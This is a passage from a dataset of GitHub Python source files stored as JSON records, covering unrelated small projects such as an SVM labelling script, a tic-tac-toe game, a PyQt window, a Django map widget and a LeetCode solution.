range(h)]\n alpha = 0.55\n \n for i in range(h):\n #Label distance for label_dist\n dist = np.abs(ldict[i].iloc[0]-ldict[i].iloc[1]) \n label_dist[i] = int(dist)\n # Get similarity score\n simscore = sim[i]\n #Calculate collective score\n collective[i] = alpha*(dist*simscore)\n #Get mapping\n map = mapping[i]\n #Calculate final score\n final_score[i] = map + collective[i]\n #Generate the new labels\n new_labels[i] = round(total_list[i] + final_score[i])\n \n #Print these, please comment out for large datasets\n #print('Collective:', collective)\n #print('Finale:', new_labels)\n #print('New Labels',new_labels)\n \n return new_labels\n\n'''\nFunction Calls\n'''\n#H is the number of datapoints, set accordingly\nmapping = get_mapping(h)\nindices = knearest(h)\nsim = get_similarity_cosine(indices, h)\n#sim = get_similarity_wordnet(indices, h)\nnew_labels = getlabel(indices, sim, mapping,h)\n\n'''\nEvaluation Metrics for SVC\n'''\nmy_cm = cm(y_true, total_list, labels=[0.0,1.0,2.0,3.0,4.0])\nprint('CM : No metric' , my_cm)\n\ncm_metric_cosine = cm(y_true, new_labels, labels=[0.0,1.0,2.0,3.0,4.0])\nprint('CM Metric Cosine',cm_metric_cosine)\n\nprint(classification_report(y_true, total_list))\nprint(classification_report(y_true, new_labels))\n\n\n'''\nEvaluation Metrics for SVR\nmse_svr = mean_squared_error(y_true, total_list)\nmse_svr_ml = mean_squared_error(y_true, new_labels)\nr2_svr_ml = r2_score(y_true, new_labels)\nr2_svr = r2_score(y_true, total_list)\nprint(mse_svr, mse_svr_ml, r2_svr_ml, r2_svr)\n'''\n\n#similarity(label_dist)\n#sim = distance(labels)\n","repo_name":"jkatzy/IN4325","sub_path":"SVMreg.py","file_name":"SVMreg.py","file_ext":"py","file_size_in_byte":14456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41940984808","text":"#!/usr/bin/env python\n\ndef file_to_list(file_name):\n\ttri_data = open(file_name, \"r\")\n\n\tline = tri_data.readline()\n\ttriangle = []\n\t\n\twhile line:\n\t\tnumbers = [int(i) for i in line.split()]\n\t\ttriangle.append(numbers)\t\t\n\t\t\n\t\tline = tri_data.readline()\n\n\treturn triangle\n\ndef find_max_sum(tri_list):\n\tfor i in reversed(range(len(tri_list)-1)):\n\t\tfor j in range(len(tri_list[i])):\n\t\t\tbigger_number = max(tri_list[i+1][j], tri_list[i+1][j+1])\n\t\t\ttri_list[i][j] += bigger_number\n\n\treturn tri_list[0][0]\n\n\n#data = file_to_list(\"TRITEST.txt\")\ndata = file_to_list(\"TRIANGLE.txt\")\n\nans = find_max_sum(data)\nprint(ans)","repo_name":"aerotog/Python-Puzzles","sub_path":"TOGPyTri.py","file_name":"TOGPyTri.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5052616600","text":"import numpy as np\nimport pandas as pd\nfrom ..utils import logger\n\ndef reduce_mem_usage(df: pd.DataFrame, verbose=True) -> pd.DataFrame:\n \"\"\"\n 通过把数据类型转换成低精度这到存首内存开的效果\n\n Parameters\n ----------\n df : pd.DataFrame\n 需要正组的数据\n verbose : bool\n 是否显示log\n\n Returns\n -------\n df : pd.DataFrame\n 地征辑过的数据, 它改变原数据\n \"\"\"\n # 防止内存覆盖\n df = df.copy(deep=True)\n numerics = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']\n start_mem = df.memory_usage().sum() / 1024**2\n for col in df.columns:\n col_type = df[col].dtypes\n if col_type in numerics:\n c_min = df[col].min()\n c_max = df[col].max()\n if str(col_type)[:3] == 'int':\n if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:\n df[col] = df[col].astype(np.int8)\n elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64)\n else:\n if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:\n df[col] = df[col].astype(np.float16)\n elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n end_mem = df.memory_usage().sum() / 1024**2\n if verbose:\n logger.info('Mem. usage decreased to {:5.2f} Mb ((:.1f}% reduction)'.format(\n end_mem, 100 * (start_mem - end_mem) / start_mem))\n return df\n\n\n\n","repo_name":"darknli/PackingGeneralML","sub_path":"gml/utils/reduce_memory.py","file_name":"reduce_memory.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"10060880121","text":"from collections import namedtuple\r\nfrom io import open\r\n\r\ndef cargarRostros(archivo):\r\n archivo = open(\"rostros.txt\",\"r\") \r\n listarostro = [] #estructura para el rostro completo que esta formado por 5 lineas\r\n for lineadelarchivo in archivo: #recorrer el archivo\r\n lineadecodigo = lineadelarchivo.rstrip().split(',') #obtiene la lista de codigos por cada linea\r\n listadelineas=[]\r\n for cadacodigo in lineadecodigo: #separa el numero del caracter \r\n listadelineas.append(cadacodigo.split('\\t')) \r\n listarostro.append(lineadecodigo)\r\n return listarostro \r\n\r\n\r\ndef imprimir_rostro(rostro):\r\n for lineadelcodigo in rostro: #recorre cada linea del rostro\r\n for pardecodigo in lineadelcodigo: #recorre cada codigo de la linea\r\n imprimir_linea(pardecodigo) #imprime el caracter un numero de veces\r\n print(\"\\n\")\r\n\r\n\r\ndef imprimir_linea(codigo):\r\n numero = int(codigo[0])\r\n caracter = str(codigo[1])\r\n for i in range(0,numero):\r\n print(caracter,end=\"\")\r\n\r\n\r\n\r\ndef elegirpelo(num):\r\n \r\n tipoPelo = namedtuple('TipoPelo',['Num','codigo','dibujo'])\r\n t1 = tipoPelo(1,'1 ,9W',' WWWWWWWWW')\r\n t2 = tipoPelo(2,'1 ,9|',' |||||||||')\r\n t3 = tipoPelo(3,'1 ,1|,7\",1|',' |\"\"\"\"\"\"\"|')\r\n t4 = tipoPelo(4,'1 ,3\\\\,6/',' \\\\\\//////')\r\n lista = [t1,t2,t3,t4]\r\n archivo = open(\"rostros.txt\",\"w\")\r\n archivo.write(lista[num-1][1])\r\n archivo.close()\r\n\r\n #print(lista[num-1][1])\r\n\r\n\r\ndef elegirojos(num):\r\n \r\n tipoOjos = namedtuple('TipoOjos',['Num','codigo','dibujo'])\r\n t1 = tipoOjos(1,'1 ,1|,2 ,1o,1 ,1o,2 ,1|',' | O O |')\r\n t2 = tipoOjos(2,'1 ,1|,1-,1(,1.,1 ,1.,1),1-,1|',' |-(. .)-|')\r\n t3 = tipoOjos(3,'1 ,1|,1-,1(,1o,1 ,1o,1),1-,1|',' |-(o o)-|')\r\n t4 = tipoOjos(4,'1 ,1|,2 ,1\\\\,1 ,1/,2 ,1|',' | \\ / |')\r\n lista = [t1,t2,t3,t4]\r\n archivo = open(\"rostros.txt\",\"a\")\r\n dibujito = \"\\n\" + lista[num-1][1]\r\n archivo.write(dibujito)\r\n archivo.close()\r\n\r\n\r\ndef elegirOrejasNariz(num):\r\n tipoOrena = namedtuple('TipoOjos',['Num','codigo','dibujo'])\r\n t1 = tipoOrena(1,'1@,4 ,1J,4 ,1@','@ J @')\r\n t2 = tipoOrena(2,'1{,4 ,1\",4 ,1}','{ \" }')\r\n t3 = tipoOrena(3,'1[,4 ,1j,4 ,1]','[ j ]')\r\n t4 = tipoOrena(4,'1<,4 ,1-,4 ,1>','< - >')\r\n lista = [t1,t2,t3,t4]\r\n archivo = open(\"rostros.txt\",\"a\")\r\n dibujito = \"\\n\" + lista[num-1][1]\r\n archivo.write(dibujito)\r\n archivo.close()\r\n\r\ndef elegirBoca(num):\r\n tipoBoca = namedtuple('TipoBoca',['Num','codigo','dibujo'])\r\n t1 = tipoBoca(1,'1 ,1|,2 ,3=,2 ,1|',' | === |')\r\n t2 = tipoBoca(2,'1 ,1|,3 ,1-,3 ,1|',' | - |')\r\n t3 = tipoBoca(3,'1 ,1|,2 ,3-,2 ,1|',' | --- |')\r\n t4 = tipoBoca(4,'1 ,1|,2 ,1\\,3-,1/,2 ,1|',' | \\---/ |')\r\n lista = [t1,t2,t3,t4]\r\n archivo = open(\"rostros.txt\",\"a\")\r\n dibujito = \"\\n\" + lista[num-1][1]\r\n archivo.write(dibujito)\r\n archivo.close()\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"Maximmxxii/RetosEnPython","sub_path":"ayudaR6.py","file_name":"ayudaR6.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11382347998","text":"from PyQt6.QtWidgets import QMainWindow, QWidget, QVBoxLayout, QHBoxLayout, QStackedWidget, QTabBar, QPushButton, \\\n QLabel, QGridLayout, QLineEdit, QTableWidget, QTableWidgetItem, QHeaderView\nfrom PyQt6.QtCharts import QChart, QChartView, QLineSeries, QValueAxis\nfrom PyQt6.QtCore import Qt\nfrom PyQt6.QtGui import QDoubleValidator, QIntValidator, QValidator\n\nfrom import_page import *\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setWindowTitle(\"Single Cell Data Processor\")\n self.setMinimumSize(1005, 600)\n\n self.main_window = QWidget()\n self.main_layout = QVBoxLayout()\n self.main_window.setLayout(self.main_layout)\n self.setCentralWidget(self.main_window)\n\n self.tab_bar = QTabBar()\n tabs = [\"Current Data\", \"Histogram\", \"Consecutive Particles\", \"Corrected Particle Data\", \"Collected Data\"]\n for tab in tabs:\n self.tab_bar.addTab(tab)\n self.main_layout.addWidget(self.tab_bar)\n\n self.stack = QStackedWidget()\n\n # -------------------------------------------- Import Page --------------------------------------------\n\n self.import_tab = ImportPage()\n\n # ----------------------------------------Histogram Window-----------------------------------------------------\n\n self.histogram_window = QWidget()\n\n # ----------------------------------Consecutive Particles Window-----------------------------------------------\n\n self.consecutive_particles_window = QWidget()\n\n # --------------------------------------Particle Data Window---------------------------------------------------\n\n self.corrected_particle_data_window = QWidget()\n\n self.collected_data_window = QWidget()\n\n stack_widgets = [self.import_tab, self.histogram_window, self.consecutive_particles_window,\n self.corrected_particle_data_window, self.collected_data_window]\n for widget in stack_widgets:\n self.stack.addWidget(widget)\n\n self.main_layout.addWidget(self.stack)\n\n self.show()\n\n\n\n\n\n\n","repo_name":"ethomp49/single_cell","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36831033738","text":"import time\n\nimport hypercube\nimport argparse\nimport numpy as np\nimport tqdm\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog=\"rndgen\", description=\"generator of (bad) random numbers\")\n parser.add_argument('filename', help=\"name of file for writing random bytes\")\n parser.add_argument('-n', '--count', default=10000, help=\"number of bytes\", type=int)\n parser.add_argument('-d', '--dim', default=20, help=\"dimensionality\", type=int)\n parser.add_argument('-m', '--modify', nargs='*', help=\"modification of hypercube values, format: \\\"regex,delta\\\"\")\n\n args = parser.parse_args()\n #args = parser.parse_args([\"bad2.bin\", \"-m\",\".*0,1\"])\n H = hypercube.Hypercube(args.dim)\n\n #parsing --modify option\n patterns = []; deltas = []\n if args.modify is not None:\n print(args.modify)\n for modstr in args.modify:\n strlist = modstr.split(\",\")\n if len(strlist) != 2:\n raise ValueError(f\"incorrect value for --modify: {modstr}, it should contain two comma-separated fields\")\n patterns.append(strlist[0])\n deltas.append(float(strlist[1]))\n\n idx = H.sampleInitialIndex()\n\n for patternstr, delta in zip(patterns, deltas):\n H.modifyProbabilities(patternstr, delta)\n\n\n res = np.zeros(args.count*8, dtype=np.uint8)\n t1 = time.perf_counter()\n for n in tqdm.tqdm(range(args.count*8)):\n idx, bit = H.sampleNextBit(idx)\n res[n] = bit\n t2 = time.perf_counter()\n print(f\"Generating finished in {t2-t1} secs\")\n\n with open(args.filename, \"wb\") as f:\n f.write(np.packbits(res))\n\n\n\n\n\n","repo_name":"teaprof/hypercube","sub_path":"src/stattest/rndgen.py","file_name":"rndgen.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35316733283","text":"#!/usr/bin/env python\n#coding=utf-8\n\n\"\"\"\n.py:\n\"\"\"\n\n__author__ = \"Francisco Maria Calisto\"\n__maintainer__ = \"Francisco Maria Calisto\"\n__email__ = \"francisco.calisto@tecnico.ulisboa.pt\"\n__license__ = \"MIT\"\n__version__ = \"1.0.1\"\n__status__ = \"Development\"\n__copyright__ = \"Copyright 2019, Instituto Superior Técnico (IST)\"\n__credits__ = [\n \"Bruno Oliveira\",\n \"Carlos Santiago\",\n \"Jacinto C. Nascimento\",\n \"Pedro Miraldo\",\n \"Nuno Nunes\"\n]\n\nimport os\nimport sys\n\nfrom os import path\n\nimport tobii_research as tr\nimport time\n\n# The current folder path.\nbasePath = os.path.dirname(__file__)\n\n# The path to the repository \"src\" folder.\njoinPath = os.path.join(basePath, '..')\npathAbsPath = os.path.abspath(joinPath)\n# Add the directory containing the module to\n# the Python path (wants absolute paths).\nsys.path.append(pathAbsPath)\n\ndef find_eyetrackers_meta():\n found_eyetrackers = tr.find_all_eyetrackers()\n # available_eyetracker = found_eyetrackers[0]\n\n for available_eyetracker in found_eyetrackers:\n print(\"Address: \" + available_eyetracker.address)\n print(\"Model: \" + available_eyetracker.model)\n print(\"Name (It's OK if this is empty): \" + available_eyetracker.device_name)\n print(\"Serial number: \" + available_eyetracker.serial_number)\n\n if tr.CAPABILITY_CAN_SET_DISPLAY_AREA in available_eyetracker.device_capabilities:\n print(\"The display area can be set on the eye tracker.\")\n else:\n print(\"The display area can not be set on the eye tracker.\")\n if tr.CAPABILITY_HAS_EXTERNAL_SIGNAL in available_eyetracker.device_capabilities:\n print(\"The eye tracker can deliver an external signal stream.\")\n else:\n print(\"The eye tracker can not deliver an external signal stream.\")\n if tr.CAPABILITY_HAS_EYE_IMAGES in available_eyetracker.device_capabilities:\n print(\"The eye tracker can deliver an eye image stream.\")\n else:\n print(\"The eye tracker can not deliver an eye image stream.\")\n if tr.CAPABILITY_HAS_GAZE_DATA in available_eyetracker.device_capabilities:\n print(\"The eye tracker can deliver a gaze data stream.\")\n else:\n print(\"The eye tracker can not deliver a gaze data stream.\")\n if tr.CAPABILITY_HAS_HMD_GAZE_DATA in available_eyetracker.device_capabilities:\n print(\"The eye tracker can deliver a HMD gaze data stream.\")\n else:\n print(\"The eye tracker can not deliver a HMD gaze data stream.\")\n if tr.CAPABILITY_CAN_DO_SCREEN_BASED_CALIBRATION in available_eyetracker.device_capabilities:\n print(\"The eye tracker can do a screen based calibration.\")\n else:\n print(\"The eye tracker can not do a screen based calibration.\")\n if tr.CAPABILITY_CAN_DO_MONOCULAR_CALIBRATION in available_eyetracker.device_capabilities:\n print(\"The eye tracker can do a monocular calibration.\")\n else:\n print(\"The eye tracker can not do a monocular calibration.\")\n if tr.CAPABILITY_CAN_DO_HMD_BASED_CALIBRATION in available_eyetracker.device_capabilities:\n print(\"The eye tracker can do a HMD screen based calibration.\")\n else:\n print(\"The eye tracker can not do a HMD screen based calibration.\")\n if tr.CAPABILITY_HAS_HMD_LENS_CONFIG in available_eyetracker.device_capabilities:\n print(\"The eye tracker can get/set the HMD lens configuration.\")\n else:\n print(\"The eye tracker can not get/set the HMD lens configuration.\")\n\n return available_eyetracker\n\n# ==================== END File ==================== #\n","repo_name":"mida-project/eye-tracker-setup","sub_path":"src/methods/finders.py","file_name":"finders.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"19"} +{"seq_id":"5660029285","text":"# -*- mode: python; coding: utf-8; -*-\n\nfrom django import forms\nfrom django.utils.safestring import mark_safe\nfrom settings import DEFAULT_WIDTH,DEFAULT_HEIGHT,DEFAULT_LAT,DEFAULT_LNG\nfrom django.conf import settings\n\nclass LocationWidget(forms.TextInput):\n def __init__(self, *args, **kw):\n\n self.map_width = kw.pop(\"map_width\", DEFAULT_WIDTH)\n self.map_height = kw.pop(\"map_height\", DEFAULT_HEIGHT)\n\n super(LocationWidget, self).__init__(*args, **kw)\n self.inner_widget = forms.widgets.HiddenInput()\n #self.checkbox_widget = forms.widgets.CheckboxInput()\n\n def render(self, name, value, *args, **kwargs):\n if value is None:\n lat, lng = DEFAULT_LAT, DEFAULT_LNG\n else:\n if isinstance(value, unicode):\n a, b = value.split(',')\n else:\n a, b = value\n lat, lng = float(a), float(b)\n\n js = '''\n \n \n \n ''' % dict(name=name, lat=lat, lng=lng, media_path=settings.ADMIN_MEDIA_PREFIX )\n html = self.inner_widget.render(\"%s\" % name, \"%f,%f\" % (lat, lng), dict(id='id_%s' % name))\n #html += self.checkbox_widget.render(\"\", \"\",{\"onclick\":\"load_%s();\"%name})\n html += '
        ' % (name, self.map_width, self.map_height)\n\n return mark_safe(js + html)\n\n class Media:\n js = (\n 'http://maps.google.com/maps/api/js?sensor=false',\n )\n","repo_name":"coolchevy/django-googlemaps","sub_path":"googlemaps/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"36359928741","text":"from active_games import active_games\r\n\r\ndef is_bot(author_id, game_room):\r\n\tfor member in game_room.members:\r\n\t\tif member.id == author_id:\r\n\t\t\treturn False\r\n\treturn True\r\n\r\nasync def is_open(ctx):\r\n if ctx.channel.id not in active_games:\r\n await ctx.send(\"시작한 게임이 존재하지 않습니다.\")\r\n return\r\n room_info = active_games[ctx.channel.id]['game_room']\r\n if not room_info.can_join:\r\n await ctx.send(\"참가가 이미 마감되었습니다.\")\r\n return\r\n if len(room_info.members) >= 10:\r\n await ctx.send(\"제한 인원(10명)을 초과하였습니다.\")\r\n return\r\n return room_info\r\n\r\nasync def add_role_in_active_roles(role, active_roles, game_room):\r\n if role not in active_roles:\r\n active_roles.append(role)\r\n await game_room.main_channel.send(f\"{role} 역할이 추가되었습니다.\")\r\n else:\r\n await game_room.main_channel.send(f\"{role}는(은) 이미 추가된 역할입니다.\")\r\n\r\nasync def remove_role_from_active_roles(role, active_roles, game_room):\r\n if role in active_roles:\r\n active_roles.remove(role)\r\n await game_room.main_channel.send(f\"{role} 역할이 삭제되었습니다.\")\r\n else:\r\n await game_room.main_channel.send(f\"{role}는(은) 추가되지 않은 역할입니다.\")\r\n\r\ndef get_current_game(user_id):\r\n for channel_id in active_games:\r\n for member in active_games[channel_id]['game_room'].members:\r\n if user_id == member.id:\r\n return active_games[channel_id]\r\n return None","repo_name":"AndroidNetrunner/resistance_avalon","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"74326945004","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import scrolledtext\nfrom tkinter import filedialog\n\nflag = False\n\n\nclass TicTacToeApp(Tk):\n def __init__(self):\n super().__init__()\n self.title(\"TicTacToe\")\n self.geometry(\"400x300\")\n self.buttons = []\n self.create_buttons()\n self.counter = 0\n self.tie = True\n screen_width = self.winfo_screenwidth()\n screen_height = self.winfo_screenheight()\n\n # Calculate the x and y coordinates to center the window\n x = (screen_width - self.winfo_reqwidth()) // 2\n y = (screen_height - self.winfo_reqheight()) // 3\n\n # Set the window geometry to be centered on the screen\n self.geometry(f\"+{x}+{y}\")\n\n def create_buttons(self):\n\n style = ttk.Style()\n style.configure(\"Custom.TButton\", font=(\"Roboto slab\", 28))\n for i in range(3):\n for j in range(3):\n index = i*3+j\n button = ttk.Button(\n self, text=\" \", command=lambda idx=index, r=i, c=j: self.button_pressed(idx, r, c), style=\"Custom.TButton\")\n\n button.grid(\n row=i, column=j, sticky=\"news\")\n\n self.buttons.append(button)\n\n for i in range(3):\n self.grid_columnconfigure(i, weight=1)\n for j in range(3):\n self.grid_rowconfigure(j, weight=1)\n\n def button_pressed(self, index, r, c):\n global flag\n\n if self.buttons[index][\"text\"] == \" \" and flag == False:\n flag = True\n self.buttons[index][\"text\"] = \"O\"\n self.buttons[index][\"state\"] = DISABLED\n self.counter += 1\n counter_row_O = 0\n for i in range(3):\n if self.buttons[r*3+i][\"text\"] == \"O\":\n counter_row_O += 1\n else:\n counter_row_O = 0\n\n counter_column_O = 0\n for j in range(3):\n if self.buttons[j*3+c][\"text\"] == \"O\":\n counter_column_O += 1\n else:\n counter_column_O = 0\n\n counter_diag_O = 0\n counter_diag2_O = 0\n for i in range(3):\n for j in range(3):\n if i == j:\n if self.buttons[i*3+j][\"text\"] == \"O\":\n counter_diag_O += 1\n else:\n counter_diag_O = 0\n if i+j == 2:\n if self.buttons[i*3+j][\"text\"] == \"O\":\n counter_diag2_O += 1\n else:\n counter_diag2_O = 0\n\n if counter_diag_O == 3 or counter_column_O == 3 or counter_row_O == 3 or counter_diag2_O == 3:\n self.print_the_winner(winner=\"O\")\n self.tie = False\n\n elif self.buttons[index][\"text\"] == \" \" and flag == True:\n flag = False\n self.counter += 1\n self.buttons[index][\"text\"] = \"X\"\n self.buttons[index][\"state\"] = DISABLED\n\n counter_row_X = 0\n for i in range(3):\n if self.buttons[r*3+i][\"text\"] == \"X\":\n counter_row_X += 1\n else:\n counter_row_X = 0\n\n counter_column_X = 0\n for j in range(3):\n if self.buttons[j*3+c][\"text\"] == \"X\":\n counter_column_X += 1\n else:\n counter_column_X = 0\n\n counter_diag_X = 0\n counter_diag2_X = 0\n for i in range(3):\n for j in range(3):\n if i == j:\n if self.buttons[i*3+j][\"text\"] == \"X\":\n counter_diag_X += 1\n else:\n counter_diag_X = 0\n if i+j == 2:\n if self.buttons[i*3+j][\"text\"] == \"X\":\n counter_diag2_X += 1\n else:\n counter_diag2_X = 0\n\n if counter_diag_X == 3 or counter_column_X == 3 or counter_row_X == 3 or counter_diag2_X == 3:\n self.print_the_winner(winner=\"X\")\n self.tie = False\n self.check_for_draw()\n\n def check_for_draw(self):\n\n print(self.counter)\n print(self.tie)\n if self.counter == 9 and self.tie:\n self.print_the_winner(winner=\"Tie\")\n\n def print_the_winner(self, winner):\n\n new_window = Toplevel(self)\n new_window.title(\"Winner tab\")\n new_window.grab_set()\n prev_x = self.winfo_x()\n prev_y = self.winfo_y()\n prev_width = self.winfo_width()\n prev_height = self.winfo_height()\n\n new_x = prev_x + (prev_width - new_window.winfo_reqwidth()) // 2\n new_y = prev_y + (prev_height - new_window.winfo_reqheight()) // 2\n\n # Place the new window at the calculated position\n new_window.geometry(f\"+{new_x}+{new_y}\")\n\n if winner != \"Tie\":\n label = ttk.Label(new_window, text=f\"The winner is {winner}\")\n label.pack()\n else:\n label = ttk.Label(new_window, text=f\"Its a Tie\")\n label.pack()\n\n restart_button = ttk.Button(\n new_window, text=\"Restart\", command=self.restart)\n quit_button = ttk.Button(new_window, text=\"Quit\", command=self.quit)\n restart_button.pack()\n quit_button.pack()\n\n def restart(self):\n self.destroy()\n new_window = TicTacToeApp()\n new_window.mainloop()\n\n def quit(self):\n quit()\n\n\nif __name__ == '__main__':\n app = TicTacToeApp()\n app.mainloop()\n","repo_name":"nick796/Python_projects","sub_path":"Tic_tac_toe_app.py","file_name":"Tic_tac_toe_app.py","file_ext":"py","file_size_in_byte":5758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36538590464","text":"from rest_framework import serializers\n\nfrom about.models import StaticPage, Team\n\n\nclass StaticPageListSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор списка статических страниц.\"\"\"\n\n class Meta:\n model = StaticPage\n fields = ['id', 'title', 'slug']\n\n\nclass StaticPageSerializer(StaticPageListSerializer):\n \"\"\"Сериализатор статических страниц.\"\"\"\n\n class Meta(StaticPageListSerializer.Meta):\n fields = StaticPageListSerializer.Meta.fields + ['content']\n\n\nclass TeamSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор команды.\"\"\"\n\n class Meta:\n model = Team\n fields = (\n 'id',\n 'first_name',\n 'last_name',\n 'position',\n 'photo',\n 'phone',\n )\n","repo_name":"antaliadom-team/backend","sub_path":"api/serializers/about_serializers.py","file_name":"about_serializers.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10934702329","text":"import os\n\n\nclass Core:\n def info(self, zolo, module, args):\n \"\"\"\n Info about Core module\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n print(f\"[Core] Version {module.version}\")\n\n def stop(self, zolo, module, args):\n \"\"\"\n Stop Zolo\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n zolo.stop()\n\n def dismodule(self, zolo, module, args):\n \"\"\"\n Disactivate a module\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n if args:\n if zolo.has_module(args[0]):\n zolo.desactive_module(args[0])\n print(f\"[Core] Module {args[0]} désactivé\")\n else:\n print(\"[ERREUR] Module inconnu\")\n else:\n print(\"[ERREUR] Syntaxe : core dismodule \")\n\n def actmodule(self, zolo, module, args):\n \"\"\"\n Activate a module\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n if args:\n if zolo.has_module(args[0]):\n zolo.active_module(args[0])\n print(f\"[Core] Module {args[0]} activé\")\n else:\n print(\"[ERREUR] Module inconnu\")\n else:\n print(\"[ERREUR] Syntaxe : core actmodule \")\n\n def modules(self, zolo, module, args):\n \"\"\"\n Show list of modules\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n print(\"[Core] Liste des modules :\")\n for i in zolo.get_all_modules():\n if i.name in zolo.get_config().disabled_modules:\n print(f\"[Core] - {i.name} (désactivé)\")\n else:\n print(f\"[Core] - {i.name}\")\n \n def load(self, zolo, module, args):\n \"\"\"\n Load a module\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n if args:\n if zolo.has_module(args[0]):\n print(\"[ERREUR] Module déjà chargé\")\n elif zolo.load_module(args[0]):\n print(f\"[Core] Module {args[0]} chargé\")\n else:\n print(f\"[ERREUR] Le module {args[0]} n'a pas de fichier info.json\")\n else:\n print(\"[ERREUR] Syntaxe : core load \")\n \n def reload(self, zolo, module, args):\n \"\"\"\n Reload a module\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n if args:\n if zolo.has_module(args[0]):\n zolo.reload_module(args[0])\n print(f\"[Core] Module {args[0]} rechargé\")\n else:\n print(\"[ERREUR] Module inconnu\")\n else:\n print(\"[ERREUR] Syntaxe : core reload \")\n \n def reloadall(self, zolo, module, args):\n \"\"\"\n Reload all modules\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n print(\"[Core] Rechargement de tous les modules...\")\n for i in zolo.get_all_modules():\n zolo.reload_module(i)\n print(f\"[Core] Module {i.name} rechargé\")\n print(\"[Core] Modules rechargés\")\n \n def clear(self, zolo, module, args):\n \"\"\"\n Clear terminal zolo\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n os.system(\"cls\")\n","repo_name":"AlexisHuvier/Zolo","sub_path":"modules/Core/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74412419884","text":"# coding=utf-8\n\n\"\"\"\nYou have a long flowerbed in which some of the plots are planted, and some are not. However, flowers cannot be planted in adjacent plots.\n\nGiven an integer array flowerbed containing 0's and 1's, where 0 means empty and 1 means not empty, and an integer n, return if n new flowers can be planted in the flowerbed without violating the no-adjacent-flowers rule.\n\n \n\nExample 1:\n\nInput: flowerbed = [1,0,0,0,1], n = 1\nOutput: true\nExample 2:\n\nInput: flowerbed = [1,0,0,0,1], n = 2\nOutput: false\n \n\nConstraints:\n\n1 <= flowerbed.length <= 2 * 104\nflowerbed[i] is 0 or 1.\nThere are no two adjacent flowers in flowerbed.\n0 <= n <= flowerbed.length\n\"\"\"\n\n\nclass Solution:\n def canPlaceFlowers(self, flowerbed: List[int], n: int) -> bool:\n \"\"\"\n 简单地使用贪心的思路,能够种花就种,不能种就往后继续尝试,直到所有格子都试过为止。\n \"\"\"\n length = len(flowerbed)\n for i in range(length):\n # 如果已经种够花了,可以提前返回true\n if n <= 0:\n return True\n\n # 如果已经种过花了,则不能再种了\n if flowerbed[i] == 1:\n continue\n\n # 如果上一个格子已经种过花了,则当前这格不能种花\n if i > 0 and flowerbed[i - 1] == 1:\n continue\n\n # 如果下一个格子已经种过花了,则当前这格不能种花\n if i < length - 1 and flowerbed[i + 1] == 1:\n continue\n\n # 可以种花了,并且记录次数\n flowerbed[i] = 1\n n -= 1\n\n return n <= 0\n","repo_name":"xiang12835/python-learning","sub_path":"leetcode/greedy/605. Can Place Flowers.py","file_name":"605. Can Place 